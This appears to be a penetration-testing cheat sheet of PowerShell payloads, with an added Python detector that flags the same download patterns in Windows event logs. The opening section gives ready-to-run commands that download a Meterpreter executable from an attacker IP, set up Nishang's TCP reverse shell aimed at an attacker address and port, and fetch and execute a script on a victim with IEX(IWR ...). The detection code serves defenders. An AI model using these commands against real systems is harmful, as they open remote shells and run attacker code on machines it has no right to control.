PowerShell Payloads
Reverse shells and enumeration scripts
cURL
$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"
Invoke-WebRequest -URI $URL -OutFile $Path
Reverse Shell
curl https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > rev.ps1
Add the following line at the end of the script to invoke the function, adjusting the arguments as needed:
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Start a web server
python3 -m http.server
Download and execute the PowerShell script from the attacker web server (on the victim machine)
powershell.exe (IEX(IWR http://10.10.14.5:8000/rev.ps1 -UseBasicParsing))
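From the defender's side, both download patterns on this page leave recognizable text in PowerShell Script Block Logging (event ID 4104) and in process-creation command lines (event ID 4688). The Python sketch below is an added example, not part of the original page or of any project listed here; it goes beyond the exact commands above by also matching the full cmdlet names and `DownloadString`, and its function names and sample records are constructed for illustration.

```python
import re

# Assumption: each input string is one command line (event 4688) or one
# script block (event 4104) already exported from the Windows event logs.
EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b|\.downloadstring\s*\(",
    re.I,
)
OUTFILE = re.compile(r"-outfile\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)


def classify(text):
    """Return (rule, urls) for one record, or None when nothing matches."""
    if not FETCH.search(text):
        return None
    urls = URL.findall(text)
    if EXEC.search(text):
        # Remote content is passed straight to the interpreter; no file is written.
        return ("fetch-and-execute", urls)
    if OUTFILE.search(text):
        # Content is saved to disk; correlate with a later process start from that path.
        return ("fetch-to-disk", urls)
    return None  # a plain web request on its own is not flagged


def scan(records):
    """Classify every record and keep the hits as (index, rule, urls)."""
    hits = []
    for i, text in enumerate(records):
        result = classify(text)
        if result:
            hits.append((i, *result))
    return hits


# Constructed sample records: two built from the commands on this page, one benign.
SAMPLE = [
    "powershell.exe (IEX(IWR http://10.10.14.5:8000/rev.ps1 -UseBasicParsing))",
    r'$URL="http://10.9.254.6/meterpreter.exe"; $Path="C:\Users\pentest\meterpreter.exe"; '
    r"Invoke-WebRequest -URI $URL -OutFile $Path",
    "Invoke-WebRequest -Uri https://intranet.example/health -UseBasicParsing",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Matching is case-insensitive because PowerShell command names are; the extracted URLs give the host and port to pivot on in proxy or firewall logs.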
Projects
HackTricks
Nishang
Framework and collection of payloads for offensive security and pentesting
PowerSploit
Project is no longer supported